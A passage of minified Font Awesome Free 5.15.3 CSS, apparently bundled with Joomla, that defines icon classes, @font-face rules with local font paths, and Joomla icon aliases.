fore{content:""}.fa-megaport:before{content:""}.fa-meh:before{content:""}.fa-meh-blank:before{content:""}.fa-meh-rolling-eyes:before{content:""}.fa-memory:before{content:""}.fa-mendeley:before{content:""}.fa-menorah:before{content:""}.fa-mercury:before{content:""}.fa-meteor:before{content:""}.fa-microblog:before{content:""}.fa-microchip:before{content:""}.fa-microphone:before{content:""}.fa-microphone-alt:before{content:""}.fa-microphone-alt-slash:before{content:""}.fa-microphone-slash:before{content:""}.fa-microscope:before{content:""}.fa-microsoft:before{content:""}.fa-minus:before{content:""}.fa-minus-circle:before{content:""}.fa-minus-square:before{content:""}.fa-mitten:before{content:""}.fa-mix:before{content:""}.fa-mixcloud:before{content:""}.fa-mixer:before{content:""}.fa-mizuni:before{content:""}.fa-mobile:before{content:""}.fa-mobile-alt:before{content:""}.fa-modx:before{content:""}.fa-monero:before{content:""}.fa-money-bill:before{content:""}.fa-money-bill-alt:before{content:""}.fa-money-bill-wave:before{content:""}.fa-money-bill-wave-alt:before{content:""}.fa-money-check:before{content:""}.fa-money-check-alt:before{content:""}.fa-monument:before{content:""}.fa-moon:before{content:""}.fa-mortar-pestle:before{content:""}.fa-mosque:before{content:""}.fa-motorcycle:before{content:""}.fa-mountain:before{content:""}.fa-mouse:before{content:""}.fa-mouse-pointer:before{content:""}.fa-mug-hot:before{content:""}.fa-music:before{content:""}.fa-napster:before{content:""}.fa-neos:before{content:""}.fa-network-wired:before{content:""}.fa-neuter:before{content:""}.fa-newspaper:before{content:""}.fa-nimblr:before{content:""}.fa-node:before{content:""}.fa-node-js:before{content:""}.fa-not-equal:before{content:""}.fa-notes-medical:before{content:""}.fa-npm:before{content:""}.fa-ns8:before{content:""}.fa-nutritionix:before{content:""}.fa-object-group:before{content:""}.fa-object-ungroup:before{content:""}.fa-octopus-deploy:before{content:""}.fa-odnoklassniki:before{content:""}.fa-odnoklassniki-square:before{content:""}.fa-oil-can:before{content:""}.fa-old-republic:before{content:""}.fa-om:before{content:""}.fa-opencart:before{content:""}.fa-openid:before{content:""}.fa-opera:before{content:""}.fa-optin-monster:before{content:""}.fa-orcid:before{content:""}.fa-osi:before{content:""}.fa-otter:before{content:""}.fa-outdent:before{content:""}.fa-page4:before{content:""}.fa-pagelines:before{content:""}.fa-pager:before{content:""}.fa-paint-brush:before{content:""}.fa-paint-roller:before{content:""}.fa-palette:before{content:""}.fa-palfed:before{content:""}.fa-pallet:before{content:""}.fa-paper-plane:before{content:""}.fa-paperclip:before{content:""}.fa-parachute-box:before{content:""}.fa-paragraph:before{content:""}.fa-parking:before{content:""}.fa-passport:before{content:""}.fa-pastafarianism:before{content:""}.fa-paste:before{content:""}.fa-patreon:before{content:""}.fa-pause:before{content:""}.fa-pause-circle:before{content:""}.fa-paw:before{content:""}.fa-paypal:before{content:""}.fa-peace:before{content:""}.fa-pen:before{content:""}.fa-pen-alt:before{content:""}.fa-pen-fancy:before{content:""}.fa-pen-nib:before{content:""}.fa-pen-square:before{content:""}.fa-pencil-alt:before{content:""}.fa-pencil-ruler:before{content:""}.fa-penny-arcade:before{content:""}.fa-people-arrows:before{content:""}.fa-people-carry:before{content:""}.fa-pepper-hot:before{content:""}.fa-perbyte:before{content:""}.fa-percent:before{content:""}.fa-percentage:before{content:""}.fa-periscope:before{content:""}.fa-person-booth:before{content:""}.fa-phabricator:before{content:""}.fa-phoenix-framework:before{content:""}.fa-phoenix-squadron:before{content:""}.fa-phone:before{content:""}.fa-phone-alt:before{content:""}.fa-phone-slash:before{content:""}.fa-phone-square:before{content:""}.fa-phone-square-alt:before{content:""}.fa-phone-volume:before{content:""}.fa-photo-video:before{content:""}.fa-php:before{content:""}.fa-pied-piper:before{content:""}.fa-pied-piper-alt:before{content:""}.fa-pied-piper-hat:before{content:""}.fa-pied-piper-pp:before{content:""}.fa-pied-piper-square:before{content:""}.fa-piggy-bank:before{content:""}.fa-pills:before{content:""}.fa-pinterest:before{content:""}.fa-pinterest-p:before{content:""}.fa-pinterest-square:before{content:""}.fa-pizza-slice:before{content:""}.fa-place-of-worship:before{content:""}.fa-plane:before{content:""}.fa-plane-arrival:before{content:""}.fa-plane-departure:before{content:""}.fa-plane-slash:before{content:""}.fa-play:before{content:""}.fa-play-circle:before{content:""}.fa-playstation:before{content:""}.fa-plug:before{content:""}.fa-plus:before{content:""}.fa-plus-circle:before{content:""}.fa-plus-square:before{content:""}.fa-podcast:before{content:""}.fa-poll:before{content:""}.fa-poll-h:before{content:""}.fa-poo:before{content:""}.fa-poo-storm:before{content:""}.fa-poop:before{content:""}.fa-portrait:before{content:""}.fa-pound-sign:before{content:""}.fa-power-off:before{content:""}.fa-pray:before{content:""}.fa-praying-hands:before{content:""}.fa-prescription:before{content:""}.fa-prescription-bottle:before{content:""}.fa-prescription-bottle-alt:before{content:""}.fa-print:before{content:""}.fa-procedures:before{content:""}.fa-product-hunt:before{content:""}.fa-project-diagram:before{content:""}.fa-pump-medical:before{content:""}.fa-pump-soap:before{content:""}.fa-pushed:before{content:""}.fa-puzzle-piece:before{content:""}.fa-python:before{content:""}.fa-qq:before{content:""}.fa-qrcode:before{content:""}.fa-question:before{content:""}.fa-question-circle:before{content:""}.fa-quidditch:before{content:""}.fa-quinscape:before{content:""}.fa-quora:before{content:""}.fa-quote-left:before{content:""}.fa-quote-right:before{content:""}.fa-quran:before{content:""}.fa-r-project:before{content:""}.fa-radiation:before{content:""}.fa-radiation-alt:before{content:""}.fa-rainbow:before{content:""}.fa-random:before{content:""}.fa-raspberry-pi:before{content:""}.fa-ravelry:before{content:""}.fa-react:before{content:""}.fa-reacteurope:before{content:""}.fa-readme:before{content:""}.fa-rebel:before{content:""}.fa-receipt:before{content:""}.fa-record-vinyl:before{content:""}.fa-recycle:before{content:""}.fa-red-river:before{content:""}.fa-reddit:before{content:""}.fa-reddit-alien:before{content:""}.fa-reddit-square:before{content:""}.fa-redhat:before{content:""}.fa-redo:before{content:""}.fa-redo-alt:before{content:""}.fa-registered:before{content:""}.fa-remove-format:before{content:""}.fa-renren:before{content:""}.fa-reply:before{content:""}.fa-reply-all:before{content:""}.fa-replyd:before{content:""}.fa-republican:before{content:""}.fa-researchgate:before{content:""}.fa-resolving:before{content:""}.fa-restroom:before{content:""}.fa-retweet:before{content:""}.fa-rev:before{content:""}.fa-ribbon:before{content:""}.fa-ring:before{content:""}.fa-road:before{content:""}.fa-robot:before{content:""}.fa-rocket:before{content:""}.fa-rocketchat:before{content:""}.fa-rockrms:before{content:""}.fa-route:before{content:""}.fa-rss:before{content:""}.fa-rss-square:before{content:""}.fa-ruble-sign:before{content:""}.fa-ruler:before{content:""}.fa-ruler-combined:before{content:""}.fa-ruler-horizontal:before{content:""}.fa-ruler-vertical:before{content:""}.fa-running:before{content:""}.fa-rupee-sign:before{content:""}.fa-rust:before{content:""}.fa-sad-cry:before{content:""}.fa-sad-tear:before{content:""}.fa-safari:before{content:""}.fa-salesforce:before{content:""}.fa-sass:before{content:""}.fa-satellite:before{content:""}.fa-satellite-dish:before{content:""}.fa-save:before{content:""}.fa-schlix:before{content:""}.fa-school:before{content:""}.fa-screwdriver:before{content:""}.fa-scribd:before{content:""}.fa-scroll:before{content:""}.fa-sd-card:before{content:""}.fa-search:before{content:""}.fa-search-dollar:before{content:""}.fa-search-location:before{content:""}.fa-search-minus:before{content:""}.fa-search-plus:before{content:""}.fa-searchengin:before{content:""}.fa-seedling:before{content:""}.fa-sellcast:before{content:""}.fa-sellsy:before{content:""}.fa-server:before{content:""}.fa-servicestack:before{content:""}.fa-shapes:before{content:""}.fa-share:before{content:""}.fa-share-alt:before{content:""}.fa-share-alt-square:before{content:""}.fa-share-square:before{content:""}.fa-shekel-sign:before{content:""}.fa-shield-alt:before{content:""}.fa-shield-virus:before{content:""}.fa-ship:before{content:""}.fa-shipping-fast:before{content:""}.fa-shirtsinbulk:before{content:""}.fa-shoe-prints:before{content:""}.fa-shopify:before{content:""}.fa-shopping-bag:before{content:""}.fa-shopping-basket:before{content:""}.fa-shopping-cart:before{content:""}.fa-shopware:before{content:""}.fa-shower:before{content:""}.fa-shuttle-van:before{content:""}.fa-sign:before{content:""}.fa-sign-in-alt:before{content:""}.fa-sign-language:before{content:""}.fa-sign-out-alt:before{content:""}.fa-signal:before{content:""}.fa-signature:before{content:""}.fa-sim-card:before{content:""}.fa-simplybuilt:before{content:""}.fa-sink:before{content:""}.fa-sistrix:before{content:""}.fa-sitemap:before{content:""}.fa-sith:before{content:""}.fa-skating:before{content:""}.fa-sketch:before{content:""}.fa-skiing:before{content:""}.fa-skiing-nordic:before{content:""}.fa-skull:before{content:""}.fa-skull-crossbones:before{content:""}.fa-skyatlas:before{content:""}.fa-skype:before{content:""}.fa-slack:before{content:""}.fa-slack-hash:before{content:""}.fa-slash:before{content:""}.fa-sleigh:before{content:""}.fa-sliders-h:before{content:""}.fa-slideshare:before{content:""}.fa-smile:before{content:""}.fa-smile-beam:before{content:""}.fa-smile-wink:before{content:""}.fa-smog:before{content:""}.fa-smoking:before{content:""}.fa-smoking-ban:before{content:""}.fa-sms:before{content:""}.fa-snapchat:before{content:""}.fa-snapchat-ghost:before{content:""}.fa-snapchat-square:before{content:""}.fa-snowboarding:before{content:""}.fa-snowflake:before{content:""}.fa-snowman:before{content:""}.fa-snowplow:before{content:""}.fa-soap:before{content:""}.fa-socks:before{content:""}.fa-solar-panel:before{content:""}.fa-sort:before{content:""}.fa-sort-alpha-down:before{content:""}.fa-sort-alpha-down-alt:before{content:""}.fa-sort-alpha-up:before{content:""}.fa-sort-alpha-up-alt:before{content:""}.fa-sort-amount-down:before{content:""}.fa-sort-amount-down-alt:before{content:""}.fa-sort-amount-up:before{content:""}.fa-sort-amount-up-alt:before{content:""}.fa-sort-down:before{content:""}.fa-sort-numeric-down:before{content:""}.fa-sort-numeric-down-alt:before{content:""}.fa-sort-numeric-up:before{content:""}.fa-sort-numeric-up-alt:before{content:""}.fa-sort-up:before{content:""}.fa-soundcloud:before{content:""}.fa-sourcetree:before{content:""}.fa-spa:before{content:""}.fa-space-shuttle:before{content:""}.fa-speakap:before{content:""}.fa-speaker-deck:before{content:""}.fa-spell-check:before{content:""}.fa-spider:before{content:""}.fa-spinner:before{content:""}.fa-splotch:before{content:""}.fa-spotify:before{content:""}.fa-spray-can:before{content:""}.fa-square:before{content:""}.fa-square-full:before{content:""}.fa-square-root-alt:before{content:""}.fa-squarespace:before{content:""}.fa-stack-exchange:before{content:""}.fa-stack-overflow:before{content:""}.fa-stackpath:before{content:""}.fa-stamp:before{content:""}.fa-star:before{content:""}.fa-star-and-crescent:before{content:""}.fa-star-half:before{content:""}.fa-star-half-alt:before{content:""}.fa-star-of-david:before{content:""}.fa-star-of-life:before{content:""}.fa-staylinked:before{content:""}.fa-steam:before{content:""}.fa-steam-square:before{content:""}.fa-steam-symbol:before{content:""}.fa-step-backward:before{content:""}.fa-step-forward:before{content:""}.fa-stethoscope:before{content:""}.fa-sticker-mule:before{content:""}.fa-sticky-note:before{content:""}.fa-stop:before{content:""}.fa-stop-circle:before{content:""}.fa-stopwatch:before{content:""}.fa-stopwatch-20:before{content:""}.fa-store:before{content:""}.fa-store-alt:before{content:""}.fa-store-alt-slash:before{content:""}.fa-store-slash:before{content:""}.fa-strava:before{content:""}.fa-stream:before{content:""}.fa-street-view:before{content:""}.fa-strikethrough:before{content:""}.fa-stripe:before{content:""}.fa-stripe-s:before{content:""}.fa-stroopwafel:before{content:""}.fa-studiovinari:before{content:""}.fa-stumbleupon:before{content:""}.fa-stumbleupon-circle:before{content:""}.fa-subscript:before{content:""}.fa-subway:before{content:""}.fa-suitcase:before{content:""}.fa-suitcase-rolling:before{content:""}.fa-sun:before{content:""}.fa-superpowers:before{content:""}.fa-superscript:before{content:""}.fa-supple:before{content:""}.fa-surprise:before{content:""}.fa-suse:before{content:""}.fa-swatchbook:before{content:""}.fa-swift:before{content:""}.fa-swimmer:before{content:""}.fa-swimming-pool:before{content:""}.fa-symfony:before{content:""}.fa-synagogue:before{content:""}.fa-sync:before{content:""}.fa-sync-alt:before{content:""}.fa-syringe:before{content:""}.fa-table:before{content:""}.fa-table-tennis:before{content:""}.fa-tablet:before{content:""}.fa-tablet-alt:before{content:""}.fa-tablets:before{content:""}.fa-tachometer-alt:before{content:""}.fa-tag:before{content:""}.fa-tags:before{content:""}.fa-tape:before{content:""}.fa-tasks:before{content:""}.fa-taxi:before{content:""}.fa-teamspeak:before{content:""}.fa-teeth:before{content:""}.fa-teeth-open:before{content:""}.fa-telegram:before{content:""}.fa-telegram-plane:before{content:""}.fa-temperature-high:before{content:""}.fa-temperature-low:before{content:""}.fa-tencent-weibo:before{content:""}.fa-tenge:before{content:""}.fa-terminal:before{content:""}.fa-text-height:before{content:""}.fa-text-width:before{content:""}.fa-th:before{content:""}.fa-th-large:before{content:""}.fa-th-list:before{content:""}.fa-the-red-yeti:before{content:""}.fa-theater-masks:before{content:""}.fa-themeco:before{content:""}.fa-themeisle:before{content:""}.fa-thermometer:before{content:""}.fa-thermometer-empty:before{content:""}.fa-thermometer-full:before{content:""}.fa-thermometer-half:before{content:""}.fa-thermometer-quarter:before{content:""}.fa-thermometer-three-quarters:before{content:""}.fa-think-peaks:before{content:""}.fa-thumbs-down:before{content:""}.fa-thumbs-up:before{content:""}.fa-thumbtack:before{content:""}.fa-ticket-alt:before{content:""}.fa-tiktok:before{content:""}.fa-times:before{content:""}.fa-times-circle:before{content:""}.fa-tint:before{content:""}.fa-tint-slash:before{content:""}.fa-tired:before{content:""}.fa-toggle-off:before{content:""}.fa-toggle-on:before{content:""}.fa-toilet:before{content:""}.fa-toilet-paper:before{content:""}.fa-toilet-paper-slash:before{content:""}.fa-toolbox:before{content:""}.fa-tools:before{content:""}.fa-tooth:before{content:""}.fa-torah:before{content:""}.fa-torii-gate:before{content:""}.fa-tractor:before{content:""}.fa-trade-federation:before{content:""}.fa-trademark:before{content:""}.fa-traffic-light:before{content:""}.fa-trailer:before{content:""}.fa-train:before{content:""}.fa-tram:before{content:""}.fa-transgender:before{content:""}.fa-transgender-alt:before{content:""}.fa-trash:before{content:""}.fa-trash-alt:before{content:""}.fa-trash-restore:before{content:""}.fa-trash-restore-alt:before{content:""}.fa-tree:before{content:""}.fa-trello:before{content:""}.fa-tripadvisor:before{content:""}.fa-trophy:before{content:""}.fa-truck:before{content:""}.fa-truck-loading:before{content:""}.fa-truck-monster:before{content:""}.fa-truck-moving:before{content:""}.fa-truck-pickup:before{content:""}.fa-tshirt:before{content:""}.fa-tty:before{content:""}.fa-tumblr:before{content:""}.fa-tumblr-square:before{content:""}.fa-tv:before{content:""}.fa-twitch:before{content:""}.fa-twitter:before{content:""}.fa-twitter-square:before{content:""}.fa-typo3:before{content:""}.fa-uber:before{content:""}.fa-ubuntu:before{content:""}.fa-uikit:before{content:""}.fa-umbraco:before{content:""}.fa-umbrella:before{content:""}.fa-umbrella-beach:before{content:""}.fa-uncharted:before{content:""}.fa-underline:before{content:""}.fa-undo:before{content:""}.fa-undo-alt:before{content:""}.fa-uniregistry:before{content:""}.fa-unity:before{content:""}.fa-universal-access:before{content:""}.fa-university:before{content:""}.fa-unlink:before{content:""}.fa-unlock:before{content:""}.fa-unlock-alt:before{content:""}.fa-unsplash:before{content:""}.fa-untappd:before{content:""}.fa-upload:before{content:""}.fa-ups:before{content:""}.fa-usb:before{content:""}.fa-user:before{content:""}.fa-user-alt:before{content:""}.fa-user-alt-slash:before{content:""}.fa-user-astronaut:before{content:""}.fa-user-check:before{content:""}.fa-user-circle:before{content:""}.fa-user-clock:before{content:""}.fa-user-cog:before{content:""}.fa-user-edit:before{content:""}.fa-user-friends:before{content:""}.fa-user-graduate:before{content:""}.fa-user-injured:before{content:""}.fa-user-lock:before{content:""}.fa-user-md:before{content:""}.fa-user-minus:before{content:""}.fa-user-ninja:before{content:""}.fa-user-nurse:before{content:""}.fa-user-plus:before{content:""}.fa-user-secret:before{content:""}.fa-user-shield:before{content:""}.fa-user-slash:before{content:""}.fa-user-tag:before{content:""}.fa-user-tie:before{content:""}.fa-user-times:before{content:""}.fa-users:before{content:""}.fa-users-cog:before{content:""}.fa-users-slash:before{content:""}.fa-usps:before{content:""}.fa-ussunnah:before{content:""}.fa-utensil-spoon:before{content:""}.fa-utensils:before{content:""}.fa-vaadin:before{content:""}.fa-vector-square:before{content:""}.fa-venus:before{content:""}.fa-venus-double:before{content:""}.fa-venus-mars:before{content:""}.fa-vest:before{content:""}.fa-vest-patches:before{content:""}.fa-viacoin:before{content:""}.fa-viadeo:before{content:""}.fa-viadeo-square:before{content:""}.fa-vial:before{content:""}.fa-vials:before{content:""}.fa-viber:before{content:""}.fa-video:before{content:""}.fa-video-slash:before{content:""}.fa-vihara:before{content:""}.fa-vimeo:before{content:""}.fa-vimeo-square:before{content:""}.fa-vimeo-v:before{content:""}.fa-vine:before{content:""}.fa-virus:before{content:""}.fa-virus-slash:before{content:""}.fa-viruses:before{content:""}.fa-vk:before{content:""}.fa-vnv:before{content:""}.fa-voicemail:before{content:""}.fa-volleyball-ball:before{content:""}.fa-volume-down:before{content:""}.fa-volume-mute:before{content:""}.fa-volume-off:before{content:""}.fa-volume-up:before{content:""}.fa-vote-yea:before{content:""}.fa-vr-cardboard:before{content:""}.fa-vuejs:before{content:""}.fa-walking:before{content:""}.fa-wallet:before{content:""}.fa-warehouse:before{content:""}.fa-watchman-monitoring:before{content:""}.fa-water:before{content:""}.fa-wave-square:before{content:""}.fa-waze:before{content:""}.fa-weebly:before{content:""}.fa-weibo:before{content:""}.fa-weight:before{content:""}.fa-weight-hanging:before{content:""}.fa-weixin:before{content:""}.fa-whatsapp:before{content:""}.fa-whatsapp-square:before{content:""}.fa-wheelchair:before{content:""}.fa-whmcs:before{content:""}.fa-wifi:before{content:""}.fa-wikipedia-w:before{content:""}.fa-wind:before{content:""}.fa-window-close:before{content:""}.fa-window-maximize:before{content:""}.fa-window-minimize:before{content:""}.fa-window-restore:before{content:""}.fa-windows:before{content:""}.fa-wine-bottle:before{content:""}.fa-wine-glass:before{content:""}.fa-wine-glass-alt:before{content:""}.fa-wix:before{content:""}.fa-wizards-of-the-coast:before{content:""}.fa-wodu:before{content:""}.fa-wolf-pack-battalion:before{content:""}.fa-won-sign:before{content:""}.fa-wordpress:before{content:""}.fa-wordpress-simple:before{content:""}.fa-wpbeginner:before{content:""}.fa-wpexplorer:before{content:""}.fa-wpforms:before{content:""}.fa-wpressr:before{content:""}.fa-wrench:before{content:""}.fa-x-ray:before{content:""}.fa-xbox:before{content:""}.fa-xing:before{content:""}.fa-xing-square:before{content:""}.fa-y-combinator:before{content:""}.fa-yahoo:before{content:""}.fa-yammer:before{content:""}.fa-yandex:before{content:""}.fa-yandex-international:before{content:""}.fa-yarn:before{content:""}.fa-yelp:before{content:""}.fa-yen-sign:before{content:""}.fa-yin-yang:before{content:""}.fa-yoast:before{content:""}.fa-youtube:before{content:""}.fa-youtube-square:before{content:""}.fa-zhihu:before{content:""}.sr-only{border:0;clip:rect(0,0,0,0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px}.sr-only-focusable:active,.sr-only-focusable:focus{clip:auto;height:auto;margin:0;overflow:visible;position:static;width:auto}

/*!
 * Font Awesome Free 5.15.3 by @fontawesome - https://fontawesome.com
 * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License)
 */@font-face{font-family:Font Awesome\ 5 Free;font-style:normal;font-weight:400;font-display:block;src:url(../../../../../../media/vendor/fontawesome-free/webfonts/fa-regular-400.eot);src:url(../../../../../../media/vendor/fontawesome-free/webfonts/fa-regular-400.eot?#iefix) format("embedded-opentype"),url(../../../../../../media/vendor/fontawesome-free/webfonts/fa-regular-400.woff2) format("woff2"),url(../../../../../../media/vendor/fontawesome-free/webfonts/fa-regular-400.woff) format("woff"),url(../../../../../../media/vendor/fontawesome-free/webfonts/fa-regular-400.ttf) format("truetype"),url(../../../../../../media/vendor/fontawesome-free/webfonts/fa-regular-400.svg#fontawesome) format("svg")}.far{font-family:Font Awesome\ 5 Free;font-weight:400}

/*!
 * Font Awesome Free 5.15.3 by @fontawesome - https://fontawesome.com
 * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License)
 */@font-face{font-family:Font Awesome\ 5 Free;font-style:normal;font-weight:900;font-display:block;src:url(../../../../../../media/vendor/fontawesome-free/webfonts/fa-solid-900.eot);src:url(../../../../../../media/vendor/fontawesome-free/webfonts/fa-solid-900.eot?#iefix) format("embedded-opentype"),url(../../../../../../media/vendor/fontawesome-free/webfonts/fa-solid-900.woff2) format("woff2"),url(../../../../../../media/vendor/fontawesome-free/webfonts/fa-solid-900.woff) format("woff"),url(../../../../../../media/vendor/fontawesome-free/webfonts/fa-solid-900.ttf) format("truetype"),url(../../../../../../media/vendor/fontawesome-free/webfonts/fa-solid-900.svg#fontawesome) format("svg")}.fa,.fas,[class*=" icon-"],[class^=icon-]{font-family:Font Awesome\ 5 Free;font-weight:900}

/*!
 * Font Awesome Free 5.15.3 by @fontawesome - https://fontawesome.com
 * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License)
 */@font-face{font-family:Font Awesome\ 5 Brands;font-style:normal;font-weight:400;font-display:block;src:url(../../../../../../media/vendor/fontawesome-free/webfonts/fa-brands-400.eot);src:url(../../../../../../media/vendor/fontawesome-free/webfonts/fa-brands-400.eot?#iefix) format("embedded-opentype"),url(../../../../../../media/vendor/fontawesome-free/webfonts/fa-brands-400.woff2) format("woff2"),url(../../../../../../media/vendor/fontawesome-free/webfonts/fa-brands-400.woff) format("woff"),url(../../../../../../media/vendor/fontawesome-free/webfonts/fa-brands-400.ttf) format("truetype"),url(../../../../../../media/vendor/fontawesome-free/webfonts/fa-brands-400.svg#fontawesome) format("svg")}.fab,.icon-joomla{font-family:Font Awesome\ 5 Brands;font-weight:400}[class*=" icon-"],[class^=icon-]{speak:none}[class*=" fa-"].disabled,[class*=" icon-"].disabled,[class^=fa-].disabled,[class^=icon-].disabled{font-weight:400}.icon-joomla:before{content:""}.icon-accessible:before{content:""}.icon-add:before{content:""}.icon-address-book:before,.icon-address:before{content:""}.icon-align-justify:before{content:""}.icon-angle-double-left:before{content:""}.icon-angle-double-right:before{content:""}.icon-angle-down:before{content:""}.icon-angle-left:before{content:""}.icon-angle-right:before{content:""}.icon-angle-up:before{content:""}.icon-apply:before{content:""}.icon-archive:before{content:""}.icon-arrow-down-2:before{content:""}.icon-arrow-down-3:before{content:""}.icon-arrow-down-4:before{content:""}.icon-arrow-down:before{content:""}.icon-arrow-first:before{content:""}.icon-arrow-last:before{content:""}.icon-arrow-left-2:before{content:""}.icon-arrow-left-3:before{content:""}.icon-arrow-left-4:before{content:""}.icon-arrow-left:before{content:""}.icon-arrow-right-2:before{content:""}.icon-arrow-right-3:before{content:""}.icon-arrow-right-4:before{content:""}.icon-arrow-right:before{content:""}.icon-arrow-up-2:before{content:""}.icon-arrow-up-3:before{content:""}.icon-arrow-up-4:before{content:""}.icon-arrow-up:before{content:""}.icon-arrows-alt:before{content:""}.icon-asterisk:before{content:""}.icon-attachment:before{content:""}.icon-backward-2:before{content:""}.icon-backward-circle:before{content:""}.icon-backward:before{content:""}.icon-ban-circle:before{content:""}.icon-bars:before{content:""}.icon-basket:before{content:""}.icon-bell:before{content:""}.icon-bolt:before{content:""}.icon-book:before{content:""}.icon-bookmark-2:before,.icon-bookmark:before{content:""}.icon-box-add:before,.icon-box-remove:before{content:""}.icon-briefcase:before{content:""}.icon-broadcast:before{content:""}.icon-brush:before{content:""}.icon-bubble-quote:before{content:""}.icon-bullhorn:before{content:""}.icon-calendar-2:before,.icon-calendar-check:before{content:""}.icon-calendar-3:before{content:""}.icon-calendar-alt:before,.icon-calendar:before{content:""}.icon-camera-2:before{content:""}.icon-camera:before{content:""}.icon-cancel-2:before{content:""}.icon-cancel-circle:before{content:""}.icon-cancel:before{content:""}.icon-caret-down:before{content:""}.icon-caret-up:before{content:""}.icon-cart:before{content:""}.icon-chart:before{content:""}.icon-check-circle:before{content:""}.icon-check-square:before{content:""}.icon-check:before{content:""}.icon-checkbox-checked:before{content:""}.icon-checkbox-partial:before,.icon-checkbox-unchecked:before{content:""}.icon-checkbox:before{content:""}.icon-checkedout:before{content:""}.icon-checkin:before{content:""}.icon-checkmark-2:before,.icon-checkmark-circle:before{content:""}.icon-checkmark:before{content:""}.icon-chevron-down:before{content:""}.icon-chevron-left:before{content:""}.icon-chevron-right:before{content:""}.icon-chevron-up:before{content:""}.icon-circle:before{content:""}.icon-clipboard:before{content:""}.icon-clock:before{content:""}.icon-cloud-download-alt:before,.icon-cloud-download:before{content:""}.icon-cloud-upload:before{content:""}.icon-cloud:before{content:""}.icon-code:before{content:""}.icon-code-branch:before{content:""}.icon-cog:before{content:""}.icon-cogs:before{content:""}.icon-collapse:before{content:""}.icon-color-palette:before{content:""}.icon-comment-dots:before{content:""}.icon-comment:before{content:""}.icon-comments-2:before{content:""}.icon-comments:before{content:""}.icon-compass:before{content:""}.icon-connection:before{content:""}.icon-contract-2:before{content:""}.icon-contract:before{content:""}.icon-copy:before{content:""}.icon-credit-2:before,.icon-credit:before{content:""}.icon-crop:before{content:""}.icon-cube:before{content:""}.icon-cubes:before{content:""}.icon-dashboard:before{content:""}.icon-database:before{content:""}.icon-default:before{content:""}.icon-delete:before{content:""}.icon-desktop:before{content:""}.icon-downarrow:before{content:""}.icon-download:before{content:""}.icon-drawer-2:before{content:""}.icon-drawer:before{content:""}.icon-edit:before{content:""}.icon-ellipsis-h:before{content:""}.icon-ellipsis-v:before{content:""}.icon-enter:before{content:""}.icon-envelope-open-text:before{content:""}.icon-envelope-opened:before,.icon-envelope:before{content:""}.icon-equalizer:before{content:""}.icon-error:before{content:""}.icon-exclamation-circle:before{content:""}.icon-exclamation-triangle:before{content:""}.icon-exclamation:before{content:""}.icon-exit:before{content:""}.icon-expand-2:before{content:""}.icon-expand:before{content:""}.icon-expired:before{content:""}.icon-external-link-alt:before{content:""}.icon-eye-2:before,.icon-eye-blocked:before,.icon-eye-close:before{content:""}.icon-eye-open:before{content:""}.icon-eye-slash:before{content:""}.icon-eye:before{content:""}.icon-fax:before{content:""}.icon-featured:before{content:""}.icon-feed:before{content:""}.icon-file-2:before{content:""}.icon-file-add:before{content:""}.icon-file-alt:before{content:""}.icon-file-check:before{content:""}.icon-file-minus:before{content:""}.icon-file-plus:before{content:""}.icon-file-remove:before{content:""}.icon-file:before{content:""}.icon-filter:before{content:""}.icon-first:before{content:""}.icon-flag-2:before{content:""}.icon-flag-3:before,.icon-flag:before{content:""}.icon-flash:before{content:""}.icon-folder-2:before{content:""}.icon-folder-3:before{content:""}.icon-folder-close:before,.icon-folder-minus:before{content:""}.icon-folder-open:before{content:""}.icon-folder-plus-2:before{content:""}.icon-folder-plus:before{content:""}.icon-folder-remove:before,.icon-folder:before{content:""}.icon-forward-2:before{content:""}.icon-forward-circle:before{content:""}.icon-forward:before{content:""}.icon-generic:before{content:""}.icon-globe:before{content:""}.icon-grid-2:before,.icon-grid-view-2:before{content:""}.icon-grid-view:before,.icon-grid:before{content:""}.icon-handshake:before{content:""}.icon-health:before{content:""}.icon-heart-2:before,.icon-heart:before{content:""}.icon-help:before{content:""}.icon-hits:before{content:""}.icon-home-2:before,.icon-home:before{content:""}.icon-image:before,.icon-images:before{content:""}.icon-info-2:before,.icon-info-circle:before{content:""}.icon-info:before{content:""}.icon-key:before{content:""}.icon-lamp:before{content:""}.icon-language:before{content:""}.icon-last:before{content:""}.icon-leftarrow:before{content:""}.icon-lightbulb:before{content:""}.icon-lightning:before{content:""}.icon-link:before{content:""}.icon-list-2:before{content:""}.icon-list-view:before,.icon-list:before{content:""}.icon-loading:before{content:""}.icon-location:before{content:""}.icon-lock:before,.icon-locked:before{content:""}.icon-loop:before{content:""}.icon-mail-2:before,.icon-mail:before{content:""}.icon-map-signs:before{content:""}.icon-menu-2:before{content:""}.icon-menu-3:before{content:""}.icon-menu:before{content:""}.icon-minus-2:before{content:""}.icon-minus-circle:before{content:""}.icon-minus-sign:before,.icon-minus:before{content:""}.icon-mobile:before{content:""}.icon-move:before{content:""}.icon-music:before{content:""}.icon-new-tab-2:before{content:""}.icon-new-tab:before{content:""}.icon-new:before{content:""}.icon-next:before{content:""}.icon-not-ok:before{content:""}.icon-notification-2:before,.icon-notification-circle:before{content:""}.icon-notification:before{content:""}.icon-ok:before{content:""}.icon-open:before{content:""}.icon-options:before{content:""}.icon-out-2:before{content:""}.icon-out-3:before{content:""}.icon-out:before{content:""}.icon-paint-brush:before,.icon-palette:before{content:""}.icon-paperclip:before{content:""}.icon-paragraph-center:before{content:""}.icon-paragraph-justify:before{content:""}.icon-paragraph-left:before{content:""}.icon-paragraph-right:before{content:""}.icon-pause-circle:before{content:""}.icon-pause:before{content:""}.icon-pen-square:before{content:""}.icon-pencil-2:before,.icon-pencil-alt:before{content:""}.icon-pencil:before{content:""}.icon-pending:before{content:""}.icon-phone-2:before{content:""}.icon-phone:before{content:""}.icon-picture:before,.icon-pictures:before{content:""}.icon-pie:before{content:""}.icon-pin:before{content:""}.icon-play-2:before{content:""}.icon-play-circle:before{content:""}.icon-play:before{content:""}.icon-plug:before{content:""}.icon-plus-2:before{content:""}.icon-plus-circle:before{content:""}.icon-plus-square:before{content:""}.icon-plus:before{content:""}.icon-power-cord:before{content:""}.icon-power-off:before{content:""}.icon-previous:before{content:""}.icon-print:before,.icon-printer:before{content:""}.icon-project-diagram:before{content:""}.icon-protected:before{content:""}.icon-publish:before{content:""}.icon-purge:before{content:""}.icon-pushpin:before{content:""}.